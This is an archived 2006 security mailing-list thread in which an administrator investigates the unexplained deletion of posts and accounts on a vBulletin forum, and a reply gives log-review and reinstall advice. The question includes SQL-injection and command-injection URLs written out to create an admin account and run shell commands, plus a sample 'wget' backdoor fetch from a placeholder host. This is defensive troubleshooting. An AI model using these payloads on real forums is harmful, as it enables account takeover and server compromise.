From: Steven (steven@lovebug.org)
Date: Mon Jun 26 2006 - 13:21:36 EDT
Dave,
Not to point out something too obvious, but have you checked your web logs?
If they are doing SQL injection or other business through the web interface
it should all be in there. You should be able to just open up your logs and
look for things that are out of the ordinary. Look for direct queries to
your page or for possible file inclusion attacks. Next you might want to
take a look at the server logs itself and see if anyone is logging in or
logged in at strange times. Make sure your box is not completely
compromised or possibly being fiddled with by an insider. You may want to
consider completely wiping your VBulletin install and starting fresh with
patches and all. Keep your database and all but double check it to make
sure there really aren't accounts and what not that should not be there.
Good luck
Steven
----- Original Message -----
From: "Dave" <fla.tech.talk@gmail.com>
To: <pen-test@securityfocus.com>
Sent: Sunday, June 25, 2006 10:41 PM
Subject: testing vulnerable web application.
> pen testers,
>
> Our companies website hosts a forum program called vBulletin 3.0.3. A few
> recent incidents (i.e. threads vanishing, user accounts deleted) has us
> looking into how this is happening. Our manager wants to solve this
> problem 'in house' so the task was given to me and another employee to see
> if we can figure out how this is happening and stop it.
>
> 1) We have closely monitored all (co)admin and moderators activities and
> this has revealed nothing out of the ordinary.
>
> 2) We restored the DB content using a backup and within 2 days the threads
> and accounts in question were gone again.
>
> 3) We downloaded and installed a patch from vbulletin.com that was
> supposed to secure the application but this has not stopped the problem.
>
>
> We assumed the attacker was using some sort of SQL injection to alter the
> DB records or possibly he can craft a SQL query in a way that will create
> an admin account to use to simply log in and alter the records and then
> delete his username...NO rogue admin accounts have ever been found.
>
> 1) We searched the bugtraq lists at securityfocus.com and packetstorm for
> known SQL vulns for vBulletin
>
> 2) We set up a test server to test our theories without damaging the
> actual DB or interrupting normal business. The options granted to our
> vbulletin DB user are SELECT,UPDATE,ALTER,INSERT and DELETE so we set up
> our test DB with the same permissions etc...
>
>
> In our search for possible vulns we came across these links:
>
> http://packetstormsecurity.nl/0509-exploits/20050917-vbulletin-3.0.8.txt
>
> When we try to test these POC snippets we dont get results. Examples we
> have tried:
>
> USING example :
> admincp/user.php?do=find&orderby=username&limitnumber=[SQL] we crafted a
> URL:
>
>
> http://192.168.6.99:8080/vb-forums/admincp/user.php?do=find&orderby=username&limitnumber=[INSERT%20INTO%20user%20VALUES('12345',%20'6',%20'',%20'0',%20'admintest',%20'5f376e00eb11f00d0262636a5b699501',%20'2006-06-25',%20'nospam@nospam.org',%20'0',%20'',%20'',%20'',%20'',%20'',%20'2',%20'Administrator',%20'0',%20'1151266933',%20'0',%20'1151272079',%20'1151274578',%20'1151267867',%20'1',%20'10',%20'1',%20'',%20'0',%20'0',%20'0',%20'2135',%20'',%20'0000-00-00',%20'-1',%20'1',%20'',%20'0',%20'0',%20'',%20'0',%20'0',%20'-1',%20'0',%20'0',%20'$Nu')]
>
> The syntax for this SQL was obtained from the backup.sql file created by
> vBulletin. In theory this would create an account with following values:
>
> userid = 12345
> usergroupid = 6
> username = admintest
> password = 5f376e00eb11f00d0262636a5b699501 this = "password"
> passworddate = 2006-06-25
> email = nospam@nospam.org
> styleid = 0
> usertitle = Administrator
> reputation = 10
> reputationlevelid = 1
> options = 2135
> salt = $Nu
>
>
> Another example we tried:
> URL of vuln listing:
> http://packetstormsecurity.nl/0502-exploits/vbulletin-3.0.4-2.txt
>
> Reading this we wondered if the attacker was possibly running a command on
> the server (such as wget http://foobar.com/backdoor.script) then using
> this backdoor script he is able to view source code of DB related scripts
> to obtain info for DB access etc...
>
> We have tried using both the POC code and self crafted URL's like:
> http://192.168.6.99:8080/vb-forums/forumdisplay.php?GLOBALS[]=1&f=1&comma=".`echo
> _START_`.`'touch test.txt'`.`echo _END_`."
> > then
> http://192.168.6.99:8080/vb-forums/test.txt
> > 404 error file not found
>
> This is just a small list of unfruitful examples gathered during a rather
> exhaustive effort to exploit this application. To date we were not able to
> successfully exploit the vBulletin application using any of the available
> POC code snippets. We were hoping that someone out there who is more
> proficient at this line of work could shed some light on our situation and
> possibly point us in the right direction.
>
>
> Thanks in advance for any suggestions.
> Dave
>
>
>
> ------------------------------------------------------------------------------
> This List Sponsored by: Cenzic
>
> Concerned about Web Application Security? Why not go with the #1
> solution - Cenzic, the only one to win the Analyst's Choice Award from
> eWeek. As attacks through web applications continue to rise, you need to
> proactively protect your applications from hackers. Cenzic has the most
> comprehensive solutions to meet your application security penetration
> testing and vulnerability management needs. You have an option to go with
> a managed service (Cenzic ClickToSecure) or an enterprise software (Cenzic
> Hailstorm). Download FREE whitepaper on how a managed service can help
> you: http://www.cenzic.com/news_events/wpappsec.php And, now for a limited
> time we can do a FREE audit for you to confirm your results from other
> product. Contact us at request@cenzic.com for details.
> ------------------------------------------------------------------------------
>
------------------------------------------------------------------------------
This List Sponsored by: Cenzic
Concerned about Web Application Security?
Why not go with the #1 solution - Cenzic, the only one to win the Analyst's
Choice Award from eWeek. As attacks through web applications continue to rise,
you need to proactively protect your applications from hackers. Cenzic has the
most comprehensive solutions to meet your application security penetration
testing and vulnerability management needs. You have an option to go with a
managed service (Cenzic ClickToSecure) or an enterprise software
(Cenzic Hailstorm). Download FREE whitepaper on how a managed service can
help you: http://www.cenzic.com/news_events/wpappsec.php
And, now for a limited time we can do a FREE audit for you to confirm your
results from other product. Contact us at request@cenzic.com for details.
------------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:56:10 EDT